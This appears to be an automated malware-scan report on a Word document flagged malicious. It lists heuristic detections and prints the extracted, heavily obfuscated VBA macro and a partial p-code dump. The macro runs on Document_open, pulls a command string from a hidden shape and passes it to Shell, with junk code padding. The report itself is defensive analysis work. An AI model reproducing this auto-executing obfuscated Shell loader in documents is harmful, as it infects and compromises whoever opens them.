MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6772008-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6772008-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
rYOsnjwpYzBMYowuKsAj = Hex(ohuNzXCQsQlBzm) qsGAVMTi = Array(JmwzbSW, iXvNp, rMFzvSbXl, [Interaction].Shell(mYawR, WcRLwQaz), BqZSvWAD) Select Case vAaVpYkwuKzhwjYiiwWH -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27042 bytes |
SHA-256: 9ee18b2a9bf1033709e8dfbf898acafd6bdb8e257ddfcb3510d412af4650ecd9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
229 of 284 identifiers look randomly generated (e.g. 'oSCmQDvWsIDRiaPvCohVowkL') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WRYABrJvjFsji"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case rXfMDEhUjZlOZw
Case 230183493
iFkfdjcOjtQWkG = ChrB(69628824 / ChrB(92135251))
DTIjSirfutwNTOjOSTwdBZK = RcJnLjZOXUViaWLbtAinfAQ
Case 206305289
HSnLktiJNPqUETLThqztB = 267801628
IXkArXPQMiCEQlDnbqVMHUGp = 214187291
End Select
Set TzJQmiSWfozsnmzwiq = OuiiDYCjbonQvU
DSGvrUmtGOniDjPIqQ = Hex(RclSGskCqisYEXSiisjwhc)
Select Case UmsiIqZFUfkVdztHnsokmz
Case 33055682
mLwqUlfoLVQJrYQTMntXlqsZ = ChrB(148479272 / ChrB(330132826))
BulDXhtrzuilizvKIjk = PcUYwEhNwSWUWKiuZ
Case 118133080
bwjSZdCKXpfkqmiLYZNESzj = 312129683
XOOXUBkqpIRjJvuwtJXQ = 226309778
End Select
Set inzGULNacRloBPnnDnvt = dRcOiTIZpIfwqf
XOhYdPjzzVtfJGGjVof = Hex(WXrqsFBmJGrLjLP)
Select Case fsjqPjpNZjiNzcRqi
Case 3139929
RHzJzWNRKTSmpKiF = ChrB(155405121 / ChrB(177772306))
rIlwdJYYHBkEpwHJKhi = UBOftHuoDOWtPHIFfKUA
Case 179949262
GQaPcpiBYXpuGqtGDVOjUsiq = 273010615
nBdzNhFWvwFifEGCqzDUA = 120986108
End Select
Set ZGwlrdNljZtBjXYJ = pkuuBZqJcSCfmUi
oDsPvNthNVElDZiRpv = Hex(QXSYhHbOKLFwELjsUfuM)
Select Case dFqqopsNjKcIjih
Case 166489247
RazISGwuRIJAGsOc = ChrB(255022474 / ChrB(79595607))
OBwowazajvnlAz = MlQwLzrwWjjMcRNjuRf
Case 73952201
UlziSjPziXIChjcL = 279129721
DWFZHONWIVPtTV = 254588832
End Select
Set rzROsSczsJbKvklUD = coEuikUwXujkEmQTp
ucIkuIhwnDbXkvpCtzJw = Hex(jtvvhNIEpubvIZbIsu)
Select Case hClwkAJHPRQqsWD
Case 184460812
OBsBcRvKiQSAGYkbRjrEvt = ChrB(227050907 / ChrB(250802178))
bzNIjXEcGjEMEFlqlBjqGI = fPaqLXqUTGLBRhCCsOXzpjP
Case 85575721
FNKswvjSGhtGhsEPOkF = 296407354
TIizrbiIDwzNPF = 66490250
End Select
Set cUKciKAIwLVSkawJTWmF = tHTAJCjtsRmujmPuQVI
aDjGPYdCqttTEFi = Hex(qbYHRPDtiYAnjPDB)
Select Case onzHVXhSjHsOwJ
Case 123845009
FmtoVLqChiZbKUzzVLuB = ChrB(232993809 / ChrB(143729055))
XqGjuDNUthfnIJt = dwzZmwGILIutkPRwjhVw
Case 101037335
vwUNftfhrnbfQFmwSZjw = 136870164
ITjiQjEanvQwAwEZSMciQG = 116066601
End Select
Set wLKnPwORJJqAdBd = cRzjPREnrsGXVqVBCffEZQLr
zorIEvRijBzHlpjHWvWq = Hex(vTnowwVYXMFIzQcMfnzoooo)
Set QpwwCVoAp = Shapes("VWfnIPpOF").TextFrame
Select Case LNPznvpkaYnZip
Case 335064615
pcMwlfaYKXchrzCscZId = ChrB(9401630 / ChrB(71476388))
RSYkJMTwpzwGDEwRfm = nPTItdWvwIjVbiFudMvRMqb
Case 256231353
sqzndIcrKXGwJfGnQWoJi = 151898075
zJUEkUfwojaBnWHTzDd = 113330946
End Select
Set zwThoivUmdCVOCi = DsWfaSRiiTQIDoF
FUzMAXvqjbBCYf = Hex(UdKwLGmjhikDVNmRwXB)
Select Case dVKlZzEikuczjpTmIGN
Case 122634119
SMSwvilVndOzvdXVRLnnEP = ChrB(49470250 / ChrB(152176610))
oVYDQIKYmKJsoiVSNwQOAo = wRquZfiDFvHGINSX
Case 139611076
YJSOcdhSUrSqIo = 2946971
clZNksEHDzhXMFvY = 313580654
End Select
Set bftioNNHLqkOmSGz = jwHTjFKKfvJFOwtvwMVQt
LAdhNWpKORNUPaoqvZiXISDC = Hex(urTnGkirimGqzsoUUhsrthTG)
Select Case dHvHnisLWDwoNko
Case 229835554
fSqajTdFASpPzKplw = ChrB(10547244 / ChrB(95219539))
WddJFsXstCilVJmpif = oSCmQDvWsIDRiaPvCohVowkL
Case 326090236
DuqYADQEaATqNGKVikqlwL = 42876461
kBAKJsirpczBjUHzB = 200258569
End Select
Set ObLabLSRzVMrsn = nzCFvhScBlGIoJcqkRL
mYaZwqaiVdkHNEjIzviSvzK = Hex(UCdIXicajvpOYdGFHjGYBz)
mYawR = QpwwCVoAp.TextRange.Text + hWptzbjS + zwhtCnk + XHjfdj + DNYMi + AVtsJPPZ + zZLMPAiZ + NnTBIl + FHJsSri + vXkjIlD
Select Case cUkFTlZMoMdBQzPrU
Case 43699443
WKuBRfpNrlJTPQrzIhIEzX = ChrB(143266435 / ChrB(200236116))
knOiLEqHIXGiSTZiYibi = NkYzHKLCnzoPXhsbifjTLHt
Case 248878259
pNjaapuzkWCpiEuiF = 136599749
RSvmhCtCvLhGqmkRwcc = 84767442
End Select
Set uQmKplwaloGmVUzu = BXhnznDQLDwnwBcHOWB
brRzbJXbTVRmWUa = Hex(fWvcjuiiznnmdiH)
Select Case VLRzWjXUfdIcRTfJKZ
Case 210736474
VNSkZmNRMZslwwVaDScM = ChrB(261633430 / ChrB(245703785))
doLfSrAAjWjBIthYkWFIF = WdVwEFrwTskjowNGuaLYM
Case 98628330
uNhWurphdbsShKUmu = 59536526
CrRcEkKdbfwjZHPakXjzF = 199684471
End Select
Set GEwdfwanQPcMWckc = jNNBjvTKSjjPKLdYhKYIG
hAsjQwvtzzvwOsQIaIdT = Hex(MrXGEwnpRMTiEjNJ)
Select Case YRdUdHaMGawNioRGlii
Case 89330225
ZWEMAnFizmcmFkOtipTzkQ = ChrB(55440775 / ChrB(320735306))
XkKlYnqPlwuYIcTUiGoV = ZEDMHoKNDIOIjdDvwbw
Case 249310498
TlUUWMAiFKUaCwfHZR = 335673306
BipjQYzPZhfpjDFTiskb = 71724990
End Select
Set zwuhjfYnXJzGVlvoEzNkF = fiqwsMYhhXUSlrljrUr
KVpdiUXuonOadYSPqimMOq = Hex(clCADCUFttSOJpNQYoit)
Select Case LzlwnjOlEhQhwKlwhVKmhmm
Case 215163817
bnTiKCQATXCnrRSAZsEBKtE = ChrB(237946602 / ChrB(169479274))
vHTMYNEFMwuCuizjf = jJqDrlIuifjiijIuHJjGwo
Case 227014913
FVGWwZBdNRAQZrPhEiiZY = 195224284
KuzXqAZnubEwVflv = 55031945
End Select
Set CURjsVPtwBTKINcHwczC = dodFpUtuCSjWwVJw
BdHwBXUkSrVNiJwFSZj = Hex(dDAWzvjknMrTLVaVvObQJV)
Select Case HGmQkAMdVMCQUwNLK
Case 89868629
HAsBhzCotZHwoRpI = ChrB(188321543 / ChrB(218873214))
QBhTiazOfRBtWDrGQPEF = hMSDNQOwiqkiiwJZj
Case 66317222
jlXXrjlswKYtXbPipPQ = 135484382
jQAaQOsGhjkFcVfK = 271887931
End Select
Set WcYRnFzNCPOUKQpSAVW = aRslPioouGjYzotslRcvdDMc
MWTPKVKnszEjmCJQJSwjpVW = Hex(zjjsbTXFPsCIVYkkYl)
Select Case zoqmMDoaTYGVGwtrnZEZJ
Case 253431182
ictCRfFkcmwpmdXzAKA = ChrB(65290785 / ChrB(223824177))
TUKKCTnarXKQHJSAXuNoiiHG = NPaEOJcqlJYrGcl
Case 322064627
ubfWWOjznGvtTl = 87560977
DpDNVdNiZWAtJR = 113350114
End Select
Set rbnjbkrBtFbDjwRYLnC = ijjRNwwzOnqWoTCrzhbTwC
QCKBcEciVOitHvWSin = Hex(nGPEOMuaaiMjojQPODvUumE)
Const WcRLwQaz = 0
Select Case KmGEWrJDTuoIEFmlw
Case 28682676
vqBQCmMWmlcHhiCoKQDlhzU = ChrB(149316402 / ChrB(268752567))
aUijzGMmCcJWERK = XSqmGdCQcVtTLvVibw
Case 81024620
oFnVvvbZfnMmaMcCfCzzSRE = 185482522
taGGfuHETjRiVqLB = 185337437
End Select
Set oIHswTTwZzPYWBLICUUTz = FhHjLYKLnvqjPTFAcnmjUJp
JQSMoqjIlvDakSHvoOJUhqm = Hex(DBshjSYvrMWuFwWzOivTQfQ)
Select Case japnlEhwHhKNKBOjJf
Case 173061644
CCawqbtldoPodFTDw = ChrB(26396991 / ChrB(208652248))
VhtjKbDRvMhnBRRjAqwK = vTSSVjFiLmFAvuUJ
Case 281231214
PYcpRHcnLomCGHVUZOaRpr = 331602802
kZbnGXwXKBhlhFCKqiYQw = 55945343
End Select
Set wiaVGiZzXZuFrfojorOs = ZjmTLPaGThmctd
fBqokCKMnAKfBBj = Hex(hQbYuoBuTwsDsIczCjB)
Select Case hMpoFOSkiDEowdSMdwR
Case 295170235
aqKAEpsUicMBfjUtA = ChrB(189072543 / ChrB(37732240))
MQikiqhpMdJjNJH = foAZZPDarnTwzTcTMl
Case 22918411
IZVNHDHBSjnVZzN = 80228333
jhzMHsrWkrtAqUbFzNF = 124722093
End Select
Set RWHCILzzWwFQrfDGwAjdqW = OBcLLQblItoPLpKz
rYOsnjwpYzBMYowuKsAj = Hex(ohuNzXCQsQlBzm)
qsGAVMTi = Array(JmwzbSW, iXvNp, rMFzvSbXl, [Interaction].Shell(mYawR, WcRLwQaz), BqZSvWAD)
Select Case vAaVpYkwuKzhwjYiiwWH
Case 191033353
ZTskZKErzqirFOBarLkHzv = ChrB(248504961 / ChrB(242834504))
zcScEGbCIaHcEz = tDNHzFbKcEFLWVpdhHj
Case 171149302
mOtjGownuznMLOuiilvYS = 273403680
zvEhTzZVUZsGoUXsQiW = 227434815
End Select
Set RwLHuuDVoBPzrun = HdqUbTnSHFOGti
wGRhztZYCWAjXdJzajqJBfN = Hex(wKszojwcJISqZMqIhFnw)
Select Case oRsLhdpVqzpIUnv
Case 333392456
hBCinnMhAjAWiimUW = ChrB(143250912 / ChrB(186965939))
GpLYDMtDYnLziaRUOaB = jijzpwHUCozRTXIsqdia
Case 305467733
INUAsHMSFwUwubI = 93809086
EFYAkpufGSZikvajXVTcp = 40446806
End Select
Set HkiBwUdjjbvaVV = YYaUmpnnVBtPXGp
twEQPBnzLclpCpVFNOzvC = Hex(TKUwMADFGauqBbQFsW)
Select Case VQYDQBfikaiUtwY
Case 193640990
XswXDiBwhwIWjjpbTabrA = ChrB(310035152 / ChrB(294333599))
YvRuEvUdTGHLIkSmWE = DWHBrptZVwljbzazHMGtm
Case 196143897
DccdTjHpUwMpAQuaFLVw = 220161960
ZfMhkLaQKwZsEYPLapOHQ = 239417938
End Select
Set KZiNlAiQfzVCwRlww = ElQPIMVLtljkaQpPB
BzoPcfuuiWSuoqS = Hex(MwzuRWsaHwkuXENhPizwapJ)
Select Case NwUlGKfnCJpMVQr
Case 287578138
iSzuzFjuHHdWqZHPpBz = ChrB(208393310 / ChrB(145837683))
DiZAsfYjtJfwDj = LOsoqwCBRLkhwjOtMDiP
Case 101718932
wMAVbOUquWXmdnErfF = 3905370
IpIwczfPTtZTNqPfnVXoj = 176078109
End Select
Set OJKDapUYYPiMJECtc = FWAzEYnYZDJiMAhYtoRwF
zVBEfdFbkcvFaEQRFlQ = Hex(PQOpDhilKObjdf)
Select Case jDikPUjtwkVVVrB
Case 45915450
XTFqjKIuPwVzFFkMrdz = ChrB(164508012 / ChrB(190172090))
YjbVqXzMzVzfiTaOzsZ = zYNtqikIiNDhwvvVOKTluD
Case 337325479
CaXRmdiFzmcAWi = 208716627
mrikRPhnYEzoYovw = 163938275
End Select
Set qQHTWAjwiLTuwjfH = DUPinsjshdpjKrfbJrPETUiA
jWTdGTJQpscJiDXXao = Hex(tRXUoTpoPDiimOOHWQ)
End Sub
' Processing file: /tmp/qstore_r9sbbu5z
' ===============================================================================
' Module streams:
' Macros/VBA/WRYABrJvjFsji - 15071 bytes
' Line #0:
' FuncDefn (Private Sub Document_open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld rXfMDEhUjZlOZw
' SelectCase
' Line #3:
' LitDI4 0x5245 0x0DB8
' Case
' CaseDone
' Line #4:
' LitDI4 0x7398 0x0426
' LitDI4 0xDF53 0x057D
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St iFkfdjcOjtQWkG
' Line #5:
' Ld RcJnLjZOXUViaWLbtAinfAQ
' St DTIjSirfutwNTOjOSTwdBZK
' Line #6:
' LitDI4 0xF809 0x0C4B
' Case
' CaseDone
' Line #7:
' LitDI4 0x541C 0x0FF6
' St HSnLktiJNPqUETLThqztB
' Line #8:
' LitDI4 0x3D1B 0x0CC4
' St IXkArXPQMiCEQlDnbqVMHUGp
' Line #9:
' EndSelect
' Line #10:
' SetStmt
' Ld OuiiDYCjbonQvU
' Set TzJQmiSWfozsnmzwiq
' Line #11:
' Ld RclSGskCqisYEXSiisjwhc
' ArgsLd Hex 0x0001
' St DSGvrUmtGOniDjPIqQ
' Line #12:
' Ld UmsiIqZFUfkVdztHnsokmz
' SelectCase
' Line #13:
' LitDI4 0x63C2 0x01F8
' Case
' CaseDone
' Line #14:
' LitDI4 0x9D28 0x08D9
' LitDI4 0x6D5A 0x13AD
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St mLwqUlfoLVQJrYQTMntXlqsZ
' Line #15:
' Ld PcUYwEhNwSWUWKiuZ
' St BulDXhtrzuilizvKIjk
' Line #16:
' LitDI4 0x9158 0x070A
' Case
' CaseDone
' Line #17:
' LitDI4 0xB893 0x129A
' St bwjSZdCKXpfkqmiLYZNESzj
' Line #18:
' LitDI4 0x3692 0x0D7D
' St XOOXUBkqpIRjJvuwtJXQ
' Line #19:
' EndSelect
' Line #20:
' SetStmt
' Ld dRcOiTIZpIfwqf
' Set inzGULNacRloBPnnDnvt
' Line #21:
' Ld WXrqsFBmJGrLjLP
' ArgsLd Hex 0x0001
' St XOhYdPjzzVtfJGGjVof
' Line #22:
' Ld fsjqPjpNZjiNzcRqi
' SelectCase
' Line #23:
' LitDI4 0xE959 0x002F
' Case
' CaseDone
' Line #24:
' LitDI4 0x4B41 0x0943
' LitDI4 0x9712 0x0A98
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St RHzJzWNRKTSmpKiF
' Line #25:
' Ld UBOftHuoDOWtPHIFfKUA
' St rIlwdJYYHBkEpwHJKhi
' Line #26:
' LitDI4 0xCECE 0x0AB9
' Case
' CaseDone
' Line #27:
' LitDI4 0xCFB7 0x1045
' St GQaPcpiBYXpuGqtGDVOjUsiq
' Line #28:
' LitDI4 0x19FC 0x0736
' St nBdzNhFWvwFifEGCqzDUA
' Line #29:
' EndSelect
' Line #30:
' SetStmt
' Ld pkuuBZqJcSCfmUi
' Set ZGwlrdNljZtBjXYJ
' Line #31:
' Ld QXSYhHbOKLFwELjsUfuM
' ArgsLd Hex 0x0001
' St oDsPvNthNVElDZiRpv
' Line #32:
' Ld dFqqopsNjKcIjih
' SelectCase
' Line #33:
' LitDI4 0x6C9F 0x09EC
' Case
' CaseDone
' Line #34:
' LitDI4 0x558A 0x0F33
' LitDI4 0x8857 0x04BE
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St RazISGwuRIJAGsOc
' Line #35:
' Ld MlQwLzrwWjjMcRNjuRf
' St OBwowazajvnlAz
' Line #36:
' LitDI4 0x6BC9 0x0468
' Case
' CaseDone
' Line #37:
' LitDI4 0x2E79 0x10A3
' St UlziSjPziXIChjcL
' Line #38:
' LitDI4 0xB7A0 0x0F2C
' St DWFZHONWIVPtTV
' Line #39:
' EndSelect
' Line #40:
' SetStmt
' Ld coEuikUwXujkEmQTp
' Set rzROsSczsJbKvklUD
' Line #41:
' Ld jtvvhNIEpubvIZbIsu
' ArgsLd Hex 0x0001
' St ucIkuIhwnDbXkvpCtzJw
' Line #42:
' Ld hClwkAJHPRQqsWD
' SelectCase
' Line #43:
' LitDI4 0xA60C 0x0AFE
' Case
' CaseDone
' Line #44:
' LitDI4 0x859B 0x0D88
' LitDI4 0xF002 0x0EF2
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St OBsBcRvKiQSAGYkbRjrEvt
' Line #45:
' Ld fPaqLXqUTGLBRhCCsOXzpjP
' St bzNIjXEcGjEMEFlqlBjqGI
' Line #46:
' LitDI4 0xC829 0x0519
' Case
' CaseDone
' Line #47:
' LitDI4 0xD13A 0x11AA
' St FNKswvjSGhtGhsEPOkF
' Line #48:
' LitDI4 0x8F8A 0x03F6
' St TIizrbiIDwzNPF
' Line #49:
' EndSelect
' Line #50:
' SetStmt
' Ld tHTAJCjtsRmujmPuQVI
' Set cUKciKAIwLVSkawJTWmF
' Line #51:
' Ld qbYHRPDtiYAnjPDB
' ArgsLd Hex 0x0001
' St aDjGPYdCqttTEFi
' Line #52:
' Ld onzHVXhSjHsOwJ
' SelectCase
' Line #53:
' LitDI4 0xB991 0x0761
' Case
' CaseDone
' Line #54:
' LitDI4 0x3411 0x0DE3
' LitDI4 0x219F 0x0891
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St FmtoVLqChiZbKUzzVLuB
' Line #55:
' Ld dwzZmwGILIutkPRwjhVw
' St XqGjuDNUthfnIJt
' Line #56:
' LitDI4 0xB517 0x0605
' Case
' CaseDone
' Line #57:
' LitDI4 0x7914 0x0828
' St vwUNftfhrnbfQFmwSZjw
' Line #58:
' LitDI4 0x0929 0x06EB
' St ITjiQjEanvQwAwEZSMciQG
' Line #59:
' EndSelect
' Line #60:
' SetStmt
' Ld cRzjPREnrsGXVqVBCffEZQLr
' Set wLKnPwORJJqAdBd
' Line #61:
' Ld vTnowwVYXMFIzQcMfnzoooo
' ArgsLd Hex 0x0001
' St zorIEvRijBzHlpjHWvWq
' Line #62:
' SetStmt
' LitStr 0x0009 "VWfnIPpOF"
' ArgsLd Shapes 0x0001
' MemLd TextFrame
' Set QpwwCVoAp
' Line #63:
' Ld LNPznvpkaYnZip
' SelectCase
' Line #64:
' LitDI4 0xAE27 0x13F8
' Case
' CaseDone
' Line #65:
' LitDI4 0x751E 0x008F
' LitDI4 0xA4A4 0x0442
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St pcMwlfaYKXchrzCscZId
' Line #66:
' Ld nPTItdWvwIjVbiFudMvRMqb
' St RSYkJMTwpzwGDEwRfm
' Line #67:
' LitDI4 0xC7B9 0x0F45
' Case
' CaseDone
' Line #68:
' LitDI4 0xC7DB 0x090D
' St sqzndIcrKXGwJfGnQWoJi
' Line #69:
' LitDI4 0x4B02 0x06C1
' St zJUEkUfwojaBnWHTzDd
' Line #70:
' EndSelect
' Line #71:
' SetStmt
' Ld DsWfaSRiiTQIDoF
' Set zwThoivUmdCVOCi
' Line #72:
' Ld UdKwLGmjhikDVNmRwXB
' ArgsLd Hex 0x0001
' St FUzMAXvqjbBCYf
' Line #73:
' Ld dVKlZzEikuczjpTmIGN
' SelectCase
' Line #74:
' LitDI4 0x3F87 0x074F
' Case
' CaseDone
' Line #75:
' LitDI4 0xDB2A 0x02F2
' LitDI4 0x07E2 0x0912
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St SMSwvilVndOzvdXVRLnnEP
' Line #76:
' Ld wRquZfiDFvHGINSX
' St oVYDQIKYmKJsoiVSNwQOAo
' Line #77:
' LitDI4 0x4BC4 0x0852
' Case
' CaseDone
' Line #78:
' LitDI4 0xF79B 0x002C
' St YJSOcdhSUrSqIo
' Line #79:
' LitDI4 0xDC6E 0x12B0
' St clZNksEHDzhXMFvY
' Line #80:
' EndSelect
' Line #81:
' SetStmt
' Ld jwHTjFKKfvJFOwtvwMVQt
' Set bftioNNHLqkOmSGz
' Line #82:
' Ld urTnGkirimGqzsoUUhsrthTG
' ArgsLd Hex 0x0001
' St LAdhNWpKORNUPaoqvZiXISDC
' Line #83:
' Ld dHvHnisLWDwoNko
' SelectCase
' Line #84:
' LitDI4 0x0322 0x0DB3
' Case
' CaseDone
' Line #85:
' LitDI4 0xF02C 0x00A0
' LitDI4 0xEF53 0x05AC
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St fSqajTdFASpPzKplw
' Line #86:
' Ld oSCmQDvWsIDRiaPvCohVowkL
' St WddJFsXstCilVJmpif
' Line #87:
' LitDI4 0xBDFC 0x136F
' Case
' CaseDone
' Line #88:
' LitDI4 0x3E2D 0x028E
' St DuqYADQEaATqNGKVikqlwL
' Line #89:
' LitDI4 0xB409 0x0BEF
' St kBAKJsirpczBjUHzB
' Line #90:
' EndSelect
' Line #91:
' SetStmt
' Ld nzCFvhScBlGIoJcqkRL
' Set ObLabLSRzVMrsn
' Line #92:
' Ld UCdIXicajvpOYdGFHjGYBz
' ArgsLd Hex 0x0001
' St mYaZwqaiVdkHNEjIzviSvzK
' Line #93:
' Ld QpwwCVoAp
' MemLd TextRange
' MemLd Text
' Ld hWptzbjS
' Add
' Ld zwhtCnk
' Add
' Ld XHjfdj
' Add
' Ld DNYMi
' Add
' Ld AVtsJPPZ
' Add
' Ld zZLMPAiZ
' Add
' Ld NnTBIl
' Add
' Ld FHJsSri
' Add
' Ld vXkjIlD
' Add
' St mYawR
' Line #94:
' Ld cUkFTlZMoMdBQzPrU
' SelectCase
' Line #95:
' LitDI4 0xCCF3 0x029A
' Case
' CaseDone
' Line #96:
' LitDI4 0x1283 0x088A
' LitDI4 0x5C54 0x0BEF
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St WKuBRfpNrlJTPQrzIhIEzX
' Line #97:
' Ld NkYzHKLCnzoPXhsbifjTLHt
' St knOiLEqHIXGiSTZiYibi
' Line #98:
' LitDI4 0x94B3 0x0ED5
' Case
' CaseDone
' Line #99:
' LitDI4 0x58C5 0x0824
' St pNjaapuzkWCpiEuiF
' Line #100:
' LitDI4 0x72D2 0x050D
' St RSvmhCtCvLhGqmkRwcc
' Line #101:
' EndSelect
' Line #102:
' SetStmt
' Ld BXhnznDQLDwnwBcHOWB
' Set uQmKplwaloGmVUzu
' Line #103:
' Ld fWvcjuiiznnmdiH
' ArgsLd Hex 0x0001
' St brRzbJXbTVRmWUa
' Line #104:
' Ld VLRzWjXUfdIcRTfJKZ
' SelectCase
' Line #105:
' LitDI4 0x955A 0x0C8F
' Case
' CaseDone
' Line #106:
' LitDI4 0x3596 0x0F98
' LitDI4 0x2469 0x0EA5
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St VNSkZmNRMZslwwVaDScM
' Line #107:
' Ld WdVwEFrwTskjowNGuaLYM
' St doLfSrAAjWjBIthYkWFIF
' Line #108:
' LitDI4 0xF2EA 0x05E0
' Case
' CaseDone
' Line #109:
' LitDI4 0x748E 0x038C
' St uNhWurphdbsShKUmu
' Line #110:
' LitDI4 0xF177 0x0BE6
' St CrRcEkKdbfwjZHPakXjzF
' Line #111:
' EndSelect
' Line #112:
' SetStmt
' Ld jNNBjvTKSjjPKLdYhKYIG
' Set GEwdfwanQPcMWckc
' Line #113:
' Ld MrXGEwnpRMTiEjNJ
' ArgsLd Hex 0x0001
' St hAsjQwvtzzvwOsQIaIdT
' Line #114:
' Ld YRdUdHaMGawNioRGlii
' SelectCase
' Line #115:
' LitDI4 0x1231 0x0553
' Case
' CaseDone
' Line #116:
' LitDI4 0xF587 0x034D
' LitDI4 0x084A 0x131E
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St ZWEMAnFizmcmFkOtipTzkQ
' Line #117:
' Ld ZEDMHoKNDIOIjdDvwbw
' St XkKlYnqPlwuYIcTUiGoV
' Line #118:
' LitDI4 0x2D22 0x0EDC
' Case
' CaseDone
' Line #119:
' LitDI4 0xF7DA 0x1401
' St TlUUWMAiFKUaCwfHZR
' Line #120:
' LitDI4 0x6FBE 0x0446
' St BipjQYzPZhfpjDFTiskb
' Line #121:
' EndSelect
' Line #122:
' SetStmt
' Ld fiqwsMYhhXUSlrljrUr
' Set zwuhjfYnXJzGVlvoEzNkF
' Line #123:
' Ld clCADCUFttSOJpNQYoit
' ArgsLd Hex 0x0001
' St KVpdiUXuonOadYSPqimMOq
' Line #124:
' Ld LzlwnjOlEhQhwKlwhVKmhmm
' SelectCase
' Line #125:
' LitDI4 0x23A9 0x0CD3
' Case
' CaseDone
' Line #126:
' LitDI4 0xC6EA 0x0E2E
' LitDI4 0x0C6A 0x0A1A
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St bnTiKCQATXCnrRSAZsEBKtE
' Line #127:
' Ld jJqDrlIuifjiijIuHJjGwo
' St vHTMYNEFMwuCuizjf
' Line #128:
' LitDI4 0xF901 0x0D87
' Case
' CaseDone
' Line #129:
' LitDI4 0xE2DC 0x0BA2
' St FVGWwZBdNRAQZrPhEiiZY
' Line #130:
' LitDI4 0xB889 0x0347
' St KuzXqAZnubEwVflv
' Line #131:
' EndSelect
' Line #132:
' SetStmt
' Ld dodFpUtuCSjWwVJw
' Set CURjsVPtwBTKINcHwczC
' Line #133:
' Ld dDAWzvjknMrTLVaVvObQJV
' ArgsLd Hex 0x0001
' St BdHwBXUkSrVNiJwFSZj
' Line #134:
' Ld HGmQkAMdVMCQUwNLK
' SelectCase
' Line #135:
' LitDI4 0x4955 0x055B
' Case
' CaseDone
' Line #136:
' LitDI4 0x8F07 0x0B39
' LitDI4 0xBD7E 0x0D0B
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St HAsBhzCotZHwoRpI
' Line #137:
' Ld hMSDNQOwiqkiiwJZj
' St QBhTiazOfRBtWDrGQPEF
' Line #138:
' LitDI4 0xEBA6 0x03F3
' Case
' CaseDone
' Line #139:
' LitDI4 0x53DE 0x0813
' St jlXXrjlswKYtXbPipPQ
' Line #140:
' LitDI4 0xAE3B 0x1034
' St jQAaQOsGhjkFcVfK
' Line #141:
' EndSelect
' Line #142:
' SetStmt
' Ld aRslPioouGjYzotslRcvdDMc
' Set WcYRnFzNCPOUKQpSAVW
' Line #143:
' Ld zjjsbTXFPsCIVYkkYl
' ArgsLd Hex 0x0001
' St MWTPKVKnszEjmCJQJSwjpVW
' Line #144:
' Ld zoqmMDoaTYGVGwtrnZEZJ
' SelectCase
' Line #145:
' LitDI4 0x0D8E 0x0F1B
' Case
' CaseDone
' Line #146:
' LitDI4 0x4221 0x03E4
' LitDI4 0x4931 0x0D57
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St ictCRfFkcmwpmdXzAKA
' Line #147:
' Ld NPaEOJcqlJYrGcl
' St TUKKCTnarXKQHJSAXuNoiiHG
' Line #148:
' LitDI4 0x50F3 0x1332
' Case
' CaseDone
' Line #149:
' LitDI4 0x1311 0x0538
' St ubfWWOjznGvtTl
' Line #150:
' LitDI4 0x95E2 0x06C1
' St DpDNVdNiZWAtJR
' Line #151:
' EndSelect
' Line #152:
' SetStmt
' Ld ijjRNwwzOnqWoTCrzhbTwC
' Set rbnjbkrBtFbDjwRYLnC
' Line #153:
' Ld nGPEOMuaaiMjojQPODvUumE
' ArgsLd Hex 0x0001
' St QCKBcEciVOitHvWSin
' Line #154:
' Dim (Const)
' LitDI2 0x0000
' VarDefn WcRLwQaz
' Line #155:
' Ld KmGEWrJDTuoIEFmlw
' SelectCase
' Line #156:
' LitDI4 0xA9B4 0x01B5
' Case
' CaseDone
